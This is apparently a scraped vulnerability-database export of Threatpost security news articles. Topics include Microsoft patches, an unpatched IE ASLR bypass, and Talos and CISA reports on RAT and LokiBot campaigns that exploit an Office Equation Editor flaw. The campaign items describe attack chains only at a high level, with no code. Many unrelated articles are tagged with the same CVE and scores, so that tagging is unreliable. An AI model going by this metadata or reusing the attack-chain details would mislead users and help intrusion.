"title": "Four Zero Days Disclosed in Internet Explorer", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-07-28T14:23:41", "id": "THREATPOST:59C4483705849ADA19D341EFA462DD19", "href": "https://threatpost.com/four-zero-days-disclosed-in-internet-explorer/113911/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:42", "description": "Researchers at HP\u2019s Zero Day Initiative have disclosed full details and proof-of-concept exploit code for a series of bugs they discovered that allow attackers to bypass a key exploit mitigation in Internet Explorer.\n\nThe disclosure is a rarity for ZDI. The company typically does not publish complete details and exploit code for the bugs it reports to vendors until after the vulnerabilities are fixed. But in this case, Microsoft has told the researchers that the company doesn\u2019t plan to fix the vulnerabilities, even though the bugs were serous enough to win ZDI\u2019s team a $125,000 [Blue Hat Bonus](<https://threatpost.com/microsoft-launches-100000-bug-bounty-program/101015>) from Microsoft. The reason: Microsoft doesn\u2019t think the vulnerabilities affect enough users.\n\nThe vulnerabilities that the ZDI researchers submitted to Microsoft enable an attacker to fully bypass ASLR (address space layout randomization), one of the many mitigations in IE that help prevent successful exploitation of certain classes of bugs. ZDI reported the bugs to Microsoft last year and disclosed some limited details of them in February. The researchers waited to release the full details until Microsoft fixed all of the flaws, but Microsoft later informed them that they didn\u2019t plan to patch the remaining bugs because they didn\u2019t affect 64-bit systems.\n\n\u201cIn this situation, Microsoft\u2019s statement is technically correct \u2013 64-bit versions do benefit from ASLR more than 32-bit versions. A 64-bit system has a much larger address space than a 32-bit system, which makes ASLR that much more effective. However what is lost here is that the bypass described and submitted only works for 32-bit systems, which is the default configuration on millions of systems. To demonstrate this, we have released proof-of-concept (PoC) code to demonstrate this bypass on Windows 7 and Windows 8.1,\u201d a blog [post](<http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/There-and-back-again-a-journey-through-bounty-award-and/ba-p/6756465#.VYgirOs2ItZ>) from Dustin Childs of HP says. \n\nChilds, who is a former Microsoft security official, said ZDI is releasing the details and [PoC code](<https://github.com/thezdi/abusing-silent-mitigations>) in order to give users as much information as possible to defend themselves against potential attacks.\n\n\u201cSince Microsoft feels these issues do not impact a default configuration of IE (thus affecting a large number of customers), it is in their judgment not worth their resources and the potential regression risk. We disagree with that opinion and are releasing the PoC information to the community in the belief that concerned users should be as fully informed as possible in order to take whatever measures they find appropriate for their own installations,\u201d he said.\n\nMicrosoft did not provide a comment in time for publication of this story.\n", "cvss3": {}, "published": "2015-06-22T15:11:28", "type": "threatpost", "title": "HP Releases Details, Exploit Code for Unpatched IE Flaws", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-06-25T21:13:37", "id": "THREATPOST:DC91E1B2D30C1A0D1ED78420E79DCE86", "href": "https://threatpost.com/hp-releases-details-exploit-code-for-unpatched-ie-flaws/113408/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:53", "description": "Dennis Fisher and Mike Mimoso talk about the [VENOM vulnerability](<https://threatpost.com/venom-flaw-in-virtualization-software-could-lead-to-vm-escapes-data-theft/112772>), the idea of marketing bugs, Microsoft\u2019s new [Edge browser security features](<https://threatpost.com/microsoft-edge-browser-seen-as-a-big-security-upgrade/112738>) and the awesome [CSI: Cyber finale](<https://threatpost.com/the-triumphant-finale-of-csi-cyber/112820>).\n\nDownload: [digital_underground_203.mp3](<http://traffic.libsyn.com/digitalunderground/digital_underground_203.mp3>)\n\nMusic by Chris Gonsalves\n\n[![itunessub](https://media.threatpost.com/wp-content/uploads/sites/103/2014/11/07011443/itunessub.jpg)](<https://itunes.apple.com/us/podcast/digital-underground-podcast/id315355232?mt=2>)\n", "cvss3": {}, "published": "2015-05-15T11:34:18", "type": "threatpost", "title": "Dennis Fisher and Mike Mimoso on VENOM, Marketing Bugs, and More", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-05-18T17:26:21", "id": "THREATPOST:6B96C89C11F9A7363A1E592863892D36", "href": "https://threatpost.com/threatpost-news-wrap-may-15-2015/112852/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:53", "description": "Microsoft yesterday added four cryptographic cipher suites to its default priority ordering list in Windows, a move that brings Perfect Forward Secrecy to the operating system.\n\n[Update 3042058](<https://technet.microsoft.com/en-us/library/security/3042058>) is available for now only on the Microsoft Download Center, affording users the opportunity to test the ciphers before bringing them into their respective IT environments. The updates are available for Windows 7, 8 and 8.1 32- and 64-bit systems, as well as Windows Server 2008 R2 and Windows Server 2012 and 2012 R2 system.\n\n\u201cThe update adds the following cryptographic cipher suites to the default list in all affected operating systems and includes improvements to the cipher suite priority ordering,\u201d Microsoft said. The suites are:\n\n * TLS_DHE_RSA_WITH_AES_256_GCM_SHA384\n * TLS_DHE_RSA_WITH_AES_128_GCM_SHA256\n * TLS_RSA_WITH_AES_256_GCM_SHA384\n * TLS_RSA_WITH_AES_128_GCM_SHA256\n\nBringing Perfect Forward Secrecy to Windows is an important step forward, especially in context of the expressed desire of many [large technology providers to encrypt everything](<https://threatpost.com/twitter-hardens-services-with-perfect-forward-secrecy/103026>) in the wake of Snowden and NSA/GCHQ surveillance. PFS ensures that new private keys are negotiated for every session, meaning that if a key is ever compromised in the future, only that particular session will be at risk. In order to attack each session, each key would have to be attacked separately.\n\n\u201cPFS is definitely important when considering attackers with virtually unlimited resources to eavesdrop and crack encryption keys,\u201d said Craig Young, a researcher at Tripwire.\n\nWhile experts are generally applauding Microsoft\u2019s foray into PFS, Microsoft is late to the party. Google, for example, has had the capability in its products for close to three years. Others, including Dropbox, Facebook, Twitter, and Tumbler, all support PFS and have done so for at least a year. Microsoft, however, last year did bring [PFS to its web-based email service Outlook.com](<https://threatpost.com/microsoft-expands-tls-forward-secrecy-support/106965>).\n\nPFS, while a step forward, is not perfect. There is a performance hit, which Microsoft acknowledges in its advisory, because of its higher computing requirements. It urges Windows server administrators to test for jumps in resource consumption as connections encrypted with TLS/SSL scale up on the client and server side. Kenneth White, director of the Open Crypto Audit Project (OCAP) said Microsoft\u2019s use of crypto suites such as DHE rather than ECDHE, for example, could exacerbate the performance issue.\n\n\u201cIt\u2019s an important milestone, but their choices are a little puzzling,\u201d White said. \u201cFirst, the Forward Secrecy suites (DHE) are ephemeral but they don\u2019t use elliptic curves, and are actually one of the least efficient PFS suites. It\u2019s also good to see the rollout of authenticated modes (AEAD, here GCM). So, this is certainly forward progress, but it would be nice to see efficient authenticated ephemeral Diffie-Hellman ECC suites on the near-term road map.\u201d\n\nWhite said the use of DHE rather than ECDHE, in some cases, causes between twofold and eightfold decrease in performance.\n\n\u201cIt\u2019s an important milestone, but their choices are a little puzzling.\u201d \nKenneth White\n\n\u201cIf the server has to work harder, the maximum number of simultaneous connections is significantly reduced,\u201d White said. \u201cSimilarly, clients such as web browsers or API peers will have higher load using DHE.\u201d\n\nExperts have been harping on the fact that Perfect Forward Secrecy should be considered minimum crypto standard, especially with new applications. The same goes for HSTS, or [HTTP Strict Transport Security](<https://www.owasp.org/index.php/HTTP_Strict_Transport_Security>), which is a security policy header that tells browsers to communicate only over HTTPS.\n\n\u201cManaging your crypto by removing old ciphers and in this case adding new ones is a good housekeeping move for Microsoft,\u201d said Jon Rudolph, principal software engineer at Core Security. \u201cKnowing your cipher suites is like knowing what you\u2019re eating: it\u2019s a fundamental building block of trust, and it pays to read the label.\u201d\n", "cvss3": {}, "published": "2015-05-13T12:14:00", "type": "threatpost", "title": "Microsoft Brings Perfect Forward Secrecy to Windows", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-05-15T18:33:16", "id": "THREATPOST:619AA46DE90E000F02F634A9AA0FB8B0", "href": "https://threatpost.com/new-crypto-suites-bring-perfect-forward-secrecy-to-windows/112783/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:01", "description": "SAN FRANCISCO\u2013One of the downsides to being a software company with a huge customer base is that your products are going to be prime targets for attackers. But the flip side to that coin is that you\u2019re going to gather a _lot_ of data about vulnerabilities and attacks.\n\nMicrosoft has been collecting that data for years now and has used it to help inform decisions about new defensive technologies, product improvements and patching strategies. The company shared some of that information Tuesday at the RSA Conference here and some of the data they have is quite revealing. One of the most intriguing bits to come out of the numbers is that while there are still large numbers of remote code execution vulnerabilities being disclosed every year, attackers are exploiting fewer and fewer of them.\n\n\u201cVulnerabilities represent potential risk. But until somebody goes through the effort to develop an exploit that leverages that vulnerability, the risk isn\u2019t actualized. The percentage of remote code execution vulnerabilities that are actually exploited is declining. The actual risk appears to be going down based on what we see,\u201d said Matt Miller, principal security software engineer in the Microsoft Security Response Center. \u201cThe absolute number of those bugs continues to decline, as well.\u201d\n\nRemote code execution vulnerabilities are attacker catnip, and that\u2019s especially true of RCE bugs in widely deployed software such as browsers and operating systems. For years, attackers had a field day with vulnerabilities in Internet Explorer and Windows, particularly buffer overflows. Rare was the Patch Tuesday that didn\u2019t include fixes for a buffer overflow or six. But Microsoft has put a lot of resources and effort into making those bugs more difficult to exploit, and Miller said the work has paid off.\n\nIn fact, he said the company didn\u2019t see a single stack corruption exploit in 2014.\n\n\u201cA couple of things have driven that. The Security Development Lifecycle has helped us eradicate these classes of bugs. And we\u2019ve driven mitigations and improvements that have helped too,\u201d Miller said. \u201cIn practice, this isn\u2019t a vulnerability class that people go after anymore.\u201d\n\nThose changes have forced the attacker community to shift gears. Miller said attackers have started targeting use-after-free vulnerabilities more often and have moved heavily into return-oriented programming, a technique that can be used to bypass exploit mitigations in software. At the same time, the rise of easily available exploit kits such as [Angler](<https://threatpost.com/domain-shadowing-latest-angler-exploit-kit-evasion-technique/111396>), [Blackhole](<https://threatpost.com/black-hole-exploit-kit-20-released-091212/77000>) and others have made it much simpler for attackers to go after new vulnerabilities. And the exploits are showing up in those kits much more quickly than ever before.\n\nDavid Weston, principal program manager on the Microsoft One Protection team, who spoke alongside Miller, said that as recently as the beginning of 2014 it was taking roughly 30 days for exploits for a newly patched vulnerability to show up in the common exploit kits. By the end of the year, it was within ten days of the patch. And now, not only are the kit developers adding exploits for known bugs, but they are in some cases putting in exploits for undisclosed vulnerabilities.\n\n\u201cBy the beginning of this year, we\u2019re seeing the primary exploit kit developers introducing zero days,\u201d Weston said. \u201cThe trickle-down effect is changing, as we\u2019re seeing many more of these crimeware kits source things for themselves. That\u2019s a dramatic change.\u201d\n", "cvss3": {}, "published": "2015-04-21T17:41:22", "type": "threatpost", "title": "Microsoft Data Shows Drop in Remote Code Execution Bugs Being Exploited", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-04-21T21:41:22", "id": "THREATPOST:AD3C2C361C6E263CA6B217D740D6C09F", "href": "https://threatpost.com/microsoft-data-shows-drop-in-remote-code-execution-bugs-being-exploited/112371/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:07", "description": "Scott Charney, the head of Microsoft\u2019s Trustworthy Computing efforts, said that he was the one who decided it was time to [move the TwC group in a new direction](<https://threatpost.com/era-ends-with-break-up-of-trustworthy-computing-group-at-microsoft/108404>) and integrate the security functions more deeply into the company as a whole.\n\n\u201cI was the architect of these changes. This is not about the company\u2019s loss of focus or diminution of commitment. Rather, in my view, these changes are necessary if we are to advance the state of trust in computing,\u201d Charney, the corporate vice president of Trustworthy Computing at Microsoft, wrote in a blog post.\n\nThe Trustworthy Computing team was an outgrowth of the effort that Microsoft started in 2002 to build more secure software. Modest at first, the TwC group eventually grew into a large team of engineers, developers and executives and became one of the more influential groups in the company. Charney, a former Department of Justice lawyer who joined Microsoft just as the security push was getting off the ground in 2002, said that the move to disperse the TwC team into different groups and change the reporting structure would help the company react more quickly and be more efficient with security related decisions.\n\n\u201cBy consolidating work within the company, as well as altering some reporting structures, Microsoft will be able to make a number of trust-related decisions more quickly and execute plans with greater speed, whether the objective is to get innovations into the hands of our customers, improve our engineering systems, ensure compliance with legal or corporate policies, or engage with regulators around the world,\u201d Charney wrote in the [post](<http://blogs.microsoft.com/cybertrust/2014/09/22/looking-forward-trustworthy-computing/>).\n\nOne of the key functions of the TwC team over the years has been the development and implementation of the Security Development Lifecycle, the comprehensive development, engineering and deployment program that\u2019s meant to build security into the company\u2019s products from the beginning. Charney said that the SDL will remain the responsibility of the part of the TwC group that\u2019s moving to the Cloud and Enterprise Division.\n\n\u201cI will continue to lead the Trustworthy Computing team in our new home as part of the Cloud and Enterprise Division. Significantly, Trustworthy Computing will maintain our company-wide responsibility for centrally driven programs such as the Security Development Lifecycle (SDL) and Online Security Assurance (OSA). But this change will also allow us to embed ourselves more fully in the engineering division most responsible for the future of cloud and security, while increasing the impact of our critical work on privacy issues by integrating those functions directly into the appropriate engineering and legal policy organizations,\u201d Charney said.\n\nThe change to the TwC group became public last week as the company was in the process of laying off 2,100 employees as part of a series of internal changes.\n", "cvss3": {}, "published": "2014-09-23T08:53:50", "type": "threatpost", "title": "Charney on Trustworthy Computing: 'I Was the Architect of These Changes'", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-09-25T18:08:18", "id": "THREATPOST:04738138B50414CEACDB62EFA6D61789", "href": "https://threatpost.com/charney-on-trustworthy-computing-i-was-the-architect-of-these-changes/108455/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-10-20T13:38:19", "description": "An APT described as a \u201clone wolf\u201d is exploiting a decades-old Microsoft Office flaw to deliver a barrage of commodity RATs to organizations in India and Afghanistan, researchers have found.\n\nAttackers use political and government-themed malicious domains as lures in the campaign, which targets mobile devices with out-of-the-box RATs such as dcRAT and [QuasarRAT](<https://threatpost.com/apt-exploits-zerologon-targets-japanese-companies/161383/>) for Windows and AndroidRAT. They\u2019re delivering the RATs in malicious documents by exploiting [CVE-2017-11882](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2017-11882>), according to a [report published Tuesday](<https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+feedburner%2FTalos+%28Talos%E2%84%A2+Blog%29>) by Cisco Talos. \n\nThe threat group \u2013 tracked by Cisco Talos from the beginning of the year through the summer \u2013 disguises itself behind a front that seems legitimate, posing as a Pakistani IT firm called Bunse Technologies, researchers said.\n\nCVE-2017-11882 is a more than 20-year-old memory corruption vulnerability in Microsoft Office that persisted for 17 years before the company [patched it](<https://threatpost.com/microsoft-patches-17-year-old-office-bug/128904/>) in 2017. However, as recently [as two years ago](<https://threatpost.com/microsoft-arbitrary-code-execution-old-bug/145527/>), attackers were seen exploiting the bug, which allows them to run malicious code automatically without requiring user interaction.\n\nThe advanced persistent threat (APT) behind the campaign also uses a custom file enumerator and infector in the reconnaissance phase of the two-step attack, followed by a second phase added in later versions of the campaign that deploys the ultimate RAT payload, researchers said.\n\nTo host the malware payloads, the threat actor registered multiple domains with political and government themes used to fool victims, particularly ones linked to diplomatic and humanitarian efforts in Afghanistan to target entities in that country, researchers said.\n\n\u201cThis campaign is a classic example of an individual threat actor employing political, humanitarian and diplomatic themes in a campaign to deliver commodity malware to victims\u201d \u2013 in this case, RATs \u201cpacked with multiple functionalities to achieve complete control over the victim\u2019s endpoint,\u201d Cisco Talos\u2019 Asheer Malhotra wrote in the post. \n\n## **Out-of-the-Box Benefits**\n\nThe campaign reflects an increased trend by both cybercriminals and APTs to use commodity RATs instead of custom malware against victims for a number of reasons, researchers said.\n\nUsing commodity RATs gives attackers a range of out-of-the-box functionality, including preliminary reconnaissance capabilities, arbitrary command execution and data exfiltration, researchers noted. The RATs also \u201cact as excellent launch pads for deploying additional malware against their victims,\u201d Malhotra wrote.\n\nUsing commodity malware also saves attackers both the time and resource investment in developing custom malware, as the RATs have stock features requiring minimal configuration changes, researchers said.\n\nIn their post, researchers broke down the two-stage attack process as well as the specifics of each RAT they observed attackers using in the campaign. RAT functionality varies depending on the payload, they said, but generally includes capabilities such as remote shells, process management, file management, keylogging, arbitrary command execution and credential stealing.\n\n## **Initial Infection and Reconnaissance**\n\nThe infection chain consists of a reconnaissance phase that starts with malicious RTF documents and PowerShell scripts that ultimately distribute malware to victims. \n\nSpecifically, the threat actor uses the RTF to exploit the Office bug and execute a malicious PowerShell command that extracts and executes the next-stage PowerShell script. That script then base64 decodes another payload \u2013 in the case researchers observed, it was a loader executable \u2013 and activates it on the infected endpoint, Malhotra wrote.\n\nThe loader executable begins by establishing persistence for itself using a shortcut in the current user\u2019s Startup directory and then compiles hardcoded C# code into an executable assembly. It then invokes the entry point for the compiled malicious code \u2013 the previously mentioned custom file enumerator and infector \u2013 researchers found.\n\nThis C# code \u2013 which is the final payload in the reconnaissance phase \u2013 contains the file enumerator, which lists specific file types on the endpoint and sends the file paths to the command-and-control (C2) server along with file infector modules, which are different than typical executable infectors usually seen in the wild, Malhotra noted.\n\n\u201cThese modules are used for infecting benign Office documents with malicious OLE objects to weaponize them to exploit CVE-2017-11882,\u201d he wrote.\n\n## **Attack Phase**\n\nResearchers observed attackers switching up tactics to deploy commodity RATs as the final payload starting in July, they said. \n\nTo do this, attackers tweaked the reconnaissance process slightly to leverage the second-stage PowerShell script to create a BAT file on disk, researchers said. That file, in turn, would execute another PowerShell command to download and activate the RAT payload on the infected endpoint, retrieving it from one of the sites attackers set up. \n\u201cSo far, we\u2019ve observed the delivery of three types of payloads from the remote locations discovered in this phase of the campaign: DcRAT, QuasarRAT and a legitimate copy of the remote desktop client AnyDesk,\u201d Malhotra wrote.\n\nThe use of the last payload \u201cindicates a focus on manual operations where the actor would have logged into the infected devices to discern if the access was of any value,\u201d according to the writeup.\n\nAll in all, the tactics of the APT used in the campaign demonstrate \u201caggressive proliferation\u201d as the goal, as the use of out-of-the-box malware combined with customized file infections gives them a straightforward point of entry onto a victim\u2019s network, Malhotra observed.\n\n\u201cOrganizations should remain vigilant against such threats that are highly motivated to proliferate using automated mechanisms,\u201d he wrote.\n\nHowever, it seems likely that the group will eventually abandon its use of commodity malware for its own bespoke tools, which means there will probably be more threat campaigns in its future, researchers said.\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-20T13:28:13", "type": "threatpost", "title": "\u2018Lone Wolf\u2019 APT Uses Commodity RATs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882"], "modified": "2021-10-20T13:28:13", "id": "THREATPOST:BD9CDF08D7870033C1C564691CABFC16", "href": "https://threatpost.com/apt-commodity-rats-microsoft-bug/175601/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:57:36", "description": "Microsoft today pulled the plug on its Advanced Notification Service (ANS), offering it going forward only to paying Premier customers.\n\nANS preceded the release of Microsoft\u2019s monthly Patch Tuesday security bulletins; on the Thursday prior, Microsoft would provide users via its security website a high-level preview of how many bulletins could be expected on the ensuing Tuesday, and more importantly, the severity of the vulnerabilities scheduled to be patched. The advanced notification helped companies allocate resources in advance to patch prioritization and testing.\n\nMicrosoft, however, said today that the decade-old [ANS has outlived its usefulness](<http://blogs.technet.com/b/msrc/archive/2015/01/08/evolving-advance-notification-service-ans-in-2015.aspx>).\n\n\u201cANS has always been optimized for large organizations. However, customer feedback indicates that many of our large customers no longer use ANS in the same way they did in the past due to optimized testing and deployment methodologies,\u201d said Chris Betz of the Microsoft Security Resource Center. \u201cWhile some customers still rely on ANS, the vast majority waits for Update Tuesday, or take no action, allowing updates to occur automatically.\u201d\n\nBetz said Microsoft customers instead rely on Microsoft Update and Windows Server Update Service to assist with patch prioritization.\n\n\u201cCustomers are also moving to cloud-based systems which provide continuous updating,\u201d Betz said.\n\nThat rationalization isn\u2019t sitting well with some experts, who said the move is against the grain established by the Trustworthy Computing initiative, which not only revamped how Microsoft builds security in to its development lifecycle, but also gave birth to Patch Tuesday.\n\n\u201cThis is an assault on IT and IT security teams everywhere. Making this change without any lead up time is simply oblivious to the impact this will have in the real world,\u201d said Ross Barrett, senior manager of security engineering at Rapid7. \u201cMicrosoft is basically going back to a message of \u2018just blindly trust\u2019 that we will patch everything for you. Honestly, it\u2019s shocking.\u201d\n\nMicrosoft said it will provide ANS to its Premier customers through their Technical Account Manager support representatives; participants in Microsoft\u2019s MAPP partner program will also receive ANS notifications. In May, Microsoft made available its new [myBulletins service](<http://threatpost.com/microsoft-mybulletins-service-customizes-patch-details/106339>), which allows Windows admins to customize security patch information, filtering it by products in use inside an enterprise or midmarket company. Notifications and advisories were left out of myBulletins, to the chagrin of some.\n\n> Microsoft Advanced Notification Service available only to Premier support customers.\n> \n> [Tweet](<https://twitter.com/share?url=https%3A%2F%2Fthreatpost.com%2Fmicrosoft-limits-advanced-patch-notifications-to-premier-customers%2F110294%2F&text=Microsoft+Advanced+Notification+Service+available+only+to+Premier+support+customers.>)\n\n\u201cWith the advent of the famous TWC memo and years of work by MSRC to gain a solid working relationship within the security community, to suddenly switch a free and relied upon service to a fee based system will only backfire,\u201d said Andrew Storms, vice president of security services at New Context, a systems architecture firm in San Francisco. \u201cI can only imagine that since the forced retirement of so many MSRC folks in 2014, that Microsoft might be trying to make ends meet.\u201d\n\nMicrosoft in September announced it was [disbanding its Trustworthy Computing unit](<http://threatpost.com/era-ends-with-break-up-of-trustworthy-computing-group-at-microsoft/108404>), the cornerstone of the Secure Development Lifecycle born out of [Bill Gates\u2019 2002 memo](<http://www.computerbytesman.com/security/billsmemo.htm>). The decision coincided with the layoff of 2,100 employees and reshuffling of many TWC security people into the company\u2019s cloud and enterprise division, as well as Microsoft\u2019s legal group.\n\nMicrosoft was not clear on whether all of its advanced notifications will go away, including those for out-of-band patches.\n\n\u201cIf that\u2019s the case, then it will surely feel like Microsoft has stepped back in time by a decade or more,\u201d Storms said.\n", "cvss3": {}, "published": "2015-01-08T14:50:57", "type": "threatpost", "title": "Microsoft Shuts Down Patch Tuesday Advanced Notifications", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-01-12T20:44:11", "id": "THREATPOST:3283173A16F1E86892491D89F2E307C2", "href": "https://threatpost.com/microsoft-limits-advanced-patch-notifications-to-premier-customers/110294/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:54", "description": "Microsoft today provided its [Patch Tuesday advanced notification](<https://technet.microsoft.com/en-us/library/security/MS14-NOV>), giving IT managers a head\u2019s up about 16 bulletins that are scheduled to be delivered next week, including five rated critical for remote code execution and privilege escalation issues.\n\nThe heavy patch load is an anomaly for 2014, which has been relatively quiet. The last time Microsoft released anything approaching this many bulletins in one month was in September 2013.\n\n\u201cNext week will tell us how many CVEs are involved but suffice to say, this patch load will be a big impact to the enterprise,\u201d said Russ Ernst, director at Lumension.\n\nExpect another cumulative critical patch rollup for Internet Explorer and four critical bulletins others for Windows. Nine of the remaining bulletins are rated Important by Microsoft and two others Moderate.\n\nOffice software is in the crosshairs of the moderate bulletins. Microsoft said bulletins are on the way for Office 2007 SP3, Microsoft Word Viewer and Office Compatibility Pack SP 3.\n\nMicrosoft is also expected to patch vulnerabilities in Exchange Server 2007, 2010 and 2013, as well as the .NET development framework. None of those are rated critical, likely meaning an attacker would require local access in order to exploit the security issues.\n", "cvss3": {}, "published": "2014-11-06T14:34:02", "type": "threatpost", "title": "November 2014 Microsoft Patch Tuesday Security Bulletins", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-11-06T19:34:02", "id": "THREATPOST:C4DD63E36CE4313386CAB54222BDD07A", "href": "https://threatpost.com/microsoft-ready-with-16-patch-tuesday-bulletins-5-critical/109223/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:04", "description": "Microsoft has confirmed the reported [vulnerability in the WebDAV implementation in IIS 5.0, 5.1 and 6.0](<http://www.microsoft.com/technet/security/advisory/971492.mspx>), saying that the flaw could be used to bypass the authentication mechanism on the Web server. However, the company said that there are a number of mitigating factors involved and that company security officials have not seen any attacks against the weakness so far.\n\nMicrosoft officials said that the vulnerability is mitigated by several things, including the fact that WebDAV is not enabled by default on IIS 6.0. However, the WebDAV protocol is widely used to share documents and information on Web servers. Normally implemented access control lists (ACLs), which prevent users from accessing files that they do not have permission to access, also would limit the damage of an attack.\n\nThe company also said that the vulnerability affects versions 5.0 and 5.1 of IIS, along with 6.0, which was the version that had been reported to be vulnerable originally. The most effective workaround until a patch is available is to disable WebDAV.\n", "cvss3": {}, "published": "2009-05-19T13:59:37", "type": "threatpost", "title": "Microsoft confirms flaw in WebDAV in IIS", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:13", "id": "THREATPOST:FAE0DDDC6420E9881C1D719E13B77095", "href": "https://threatpost.com/microsoft-confirms-flaw-webdav-iis-051909/72674/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-10-09T22:13:17", "description": "The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is warning that the LokiBot info-stealing trojan is seeing a surge across the enterprise landscape.\n\nThe uptick started in July, according to the agency, and activity has remained \u201cpersistent\u201d ever since.\n\nLokiBot targets Windows and [Android endpoints](<https://threatpost.com/lokibot-redux-common-android-apps/157458/>), and spreads mainly through email (but also via malicious websites, texts and messaging). It typically goes after credentials (usernames, passwords, cryptocurrency wallets and more), as well as personal information. The malware steals the data through the use of a keylogger to monitor browser and desktop activity, CISA explained.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\n\u201cLokiBot has stolen credentials from multiple applications and data sources, including Windows operating system credentials, email clients, File Transfer Protocol and Secure File Transfer Protocol clients,\u201d according to the alert, [issued Tuesday](<https://us-cert.cisa.gov/ncas/alerts/aa20-266a>). \u201cLokiBot has [also] demonstrated the ability to steal credentials from\u2026Safari and Chromium and Mozilla Firefox-based web browsers.\u201d\n\nTo boot, LokiBot can also act as a backdoor into infected systems to pave the way for additional payloads.\n\nLike its Viking namesake, LokiBot is a bit of a trickster, and disguises itself in diverse attachment types, sometimes using steganography for maximum obfuscation. For instance, the malware has been disguised as a .ZIP attachment [hidden inside a .PNG file](<https://threatpost.com/lokibot-trojan-spotted-hitching-a-ride-inside-png-files/143491/>) that can slip past some email security gateways, or [hidden as an ISO disk image](<https://threatpost.com/malspam-emails-blanket-lokibot-nanocore-malware-with-iso-files/145991/>) file attachment.\n\nIt also uses a number of application guises. Since LokiBot was first reported in 2015, cyber actors have used it across a range of targeted applications,\u201d CISA noted. For instance, in February, it was seen [impersonating a launcher](<https://www.trendmicro.com/en_us/research/20/b/lokibot-impersonates-popular-game-launcher-and-drops-compiled-c-code-file.html>) for the popular Fortnite video game.\n\nOther tactics include the use of zipped files along with malicious macros in Microsoft Word and Excel, and leveraging the exploit [CVE-2017-11882](<https://threatpost.com/microsoft-arbitrary-code-execution-old-bug/145527/>) (an issue in Office Equation Editor that allows attackers to automatically run malicious code without requiring user interaction). The latter is done via malicious RTF files, researchers have observed.\n\nTo boot, researchers [have seen the malware being sold](<https://threatpost.com/u-s-manufacturer-most-recent-target-of-lokibot-malspam-campaign/148153/>) as a commodity in underground markets, with versions selling for as little as $300.\n\nWith all of these factors taken together, LokiBot represents \u201can attractive tool for a broad range of cyber actors across a wide variety of data compromise use cases,\u201d according to CISA.\n\nSaryu Nayyar, CEO at Gurucul, noted that the advisory is another indication of how malware authors have turned their malicious activities into a scalable business model.\n\n\u201cThe fact that LokiBot has been around for over four years and has gained in capability over time is a reflection of how much malicious actors have advanced the state of their art, leveraging the same development models we use in the commercial space,\u201d she said, via 